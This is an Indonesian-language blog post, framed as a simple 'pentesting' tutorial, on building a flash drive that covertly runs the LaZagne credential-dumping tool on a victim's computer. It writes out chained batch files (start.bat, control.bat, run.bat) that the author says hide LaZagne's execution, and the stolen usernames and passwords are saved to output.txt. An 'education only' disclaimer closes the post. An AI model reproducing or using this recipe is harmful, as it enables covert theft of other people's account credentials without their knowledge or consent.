Kali ini gw mau sharing tentang pentesting sederhana neeh. Yah seperti judulnya, tapi gak sangar-sangar banget sih, kalo judulnya kan ngeri tuh Mencuri Password, padahal bukan mencuri sih, hanya sedikit memanfaatkan kelalaian user
Oke langsung aja
Eh, bentar deh saya jelasin sedikit, gw demo tutorialnya pake software orang yang namanya LaZagne, setau gw LaZagne ini bekerja dengan cara memanfaatkan cookies yang tersimpan di device korban, sehingga attacker dapat mengetahui sedikit username, password dan situs tempat username serta password itu berasal meskipun tidak semuanya.
Next
Bahan
- Flashdisk kosong
- LaZagne.exe (Download sendiri, Usaha)
Buat folder di dalam flashdisk dengan nama bebas, gw bikin nama foldernya Laporan, didalam folder laporan gw bikin folder Tugas. Selanjutnya buka notepad dan ketikan code berikut
@echo off
cls
cd Tugas/Laporan
start control.bat
Simpan di dalam flashdisk di luar folder dengan nama start.bat dan type all files, kemudian buka notepad lagi dan ketikan code berikut
@echo off
cls
start run.bat
Simpan dengan nama control.bat dan taruh di flashdisk di folder Laporan > Tugas > control.bat
Buka lagi notepadnya dan ketikan code berikut
start LaZagne.exe > output.txt
Simpan dengan nama run.bat dan taruh di dalam flashdisk, di folder Laporan > Tugas > run.bat
Kemudian copy LaZagne.exe yang sudah di download tadi didalam flashdisk, di folder Laporan > Tugas > LaZagne.exe
Ket.
- File start.bat adalah file yang dibuat untuk menjalankan LaZagne.exe agar tidak ketauan bahwa kita sedang mejalankan program LaZagne di dalam flashdik
- File control.bat adalah file yg dibuat untuk menjembatani file run.bat yang akan mengeksekusi LaZagne.exe dan membuat file output dengan nama yg telah di tentukan
Nah jika sudah selesai maka akan keluar file output yg telah kalian setting sebelumnya, dan didalam folder ini ada username login dan password yg didapat dari cookies yang tersmpan di pc korban
Gw juga buat tutor videonya nih
Ok, Thanks
NB: Semua artikel yg tercantum di http://www.tylexit.tk/ adalah sekedar pengetahuan dan edukasi. Penyalahgunaa di luar tanggung jawab kami
0 komentar:
Posting Komentar